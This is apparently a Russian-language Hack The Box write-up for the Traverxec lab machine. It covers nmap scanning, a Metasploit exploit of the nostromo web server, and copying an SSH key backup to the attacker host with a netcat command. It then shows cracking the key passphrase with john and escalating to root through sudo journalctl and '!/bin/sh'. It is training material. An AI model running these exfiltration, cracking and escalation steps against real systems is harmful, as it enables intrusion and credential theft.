HTB Traverxec - HackMD

# HTB Traverxec ## Cканирование Добавим в файл etc/hosts ip нашей машинки, чтобы можно было обращатся по имени nano /etc/hosts * 10.10.10.165 traverxec.htb ![](https://i.imgur.com/JwHCis2.png) затем просканим машинку: * nmap -sV -O -A -p- --open -sS -Pn -n traverxec.htb где: -Pn - выключить пинг-сканирование, и считать, что все целевые адреса существуют -n - не выполняем обратный резолв -sS - syn сканирование открытые порты определяем -sV - определяем версию сервисов -O - определение версии ОС -А - агрессивное сканирование -p- - сканирование всех портов(по умолчанию нмап сканит первые 1000 портов по TCP) –open - хотим получить только открытые порты traverxec.htb - имя нашей машинки ![](https://i.imgur.com/gtQXdLg.png) ![](https://i.imgur.com/t7vMoi1.png) На 80 порту висит nostromo (cервис) * ip a наш айпишник 10.10.14.2 ## Поиск эксплойта и получение первоначального доступа Запустим metasploit * msfconsole Поищем эксплойты * search exploit nostromo ![](https://i.imgur.com/6yULgiL.png) Укажем адрес акакуемой и нашей тачки * set rhosts traverxec.htb * set lhost 10.10.14.2 * run / exploit ![](https://i.imgur.com/pSIRIb6.png) Перешли в шелл * shell -t ![](https://i.imgur.com/Jta32Ba.png) Попробовали перейти в папку root - permission denied ![](https://i.imgur.com/V92iNlM.png) ## Повысим привилегии до юзера Смотрим конфигурацию самого сервера * cd /var/nostromo/conf * cat nhttpd.conf ![](https://i.imgur.com/M4XCgHW.png) В домашней директории находим папку public_www ![](https://i.imgur.com/SqwRwp4.png) ![](https://i.imgur.com/Ro77NtE.png) В этой папке находится находится архив Наша задача перенести этот архив на хост и сбрутить хэши Поднимаем **netcat** На хосте * nc -lvnp 1234 > backup-ssh-identity-files.tgz На атакуемой машине * nc -w3 10.10.14.2 1234 < backup-ssh-identity-files.tgz ![](https://i.imgur.com/lOPAD3s.png) Разархивируем полученный архив * tar -xvzf backup-ssh-identity-files.tgz ![](https://i.imgur.com/gcAeUlI.png) Скопируем в папку откуда будем делать подключение по ssh * cp /home/user/HTB/traverxec/home/david/.ssh authorized_keys id_rsa id_rsa.pub ~/htb/traverxec **Запускаем джона** и делаем из ключа хэш ![](https://i.imgur.com/TMwLPWO.png) * python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash Брутим джоном хэш * john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash ![](https://i.imgur.com/YVjYTAm.png) получили пароль от smb - hunter Подключаемся по ssh и вводим пароль ![](https://i.imgur.com/FNMLMsG.png) Нашли флаг юзера ![](https://i.imgur.com/JcGAEl5.png) ## Получаем рута Смотрим что еще есть инетерсного у пользователя Находим скрипт server-stats.sh Открываем его и видим строчку, в которой указано что данная строчка запускается с правами рута ![](https://i.imgur.com/ZKIyXeb.png) Запускаем сервис * /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service Дописываем * !/bin/sh ![](https://i.imgur.com/p7p4mNF.png) Получаем рута ![](https://i.imgur.com/Ryax2tK.png) Получили флаг рута ![](https://i.imgur.com/4Nq1rpz.png)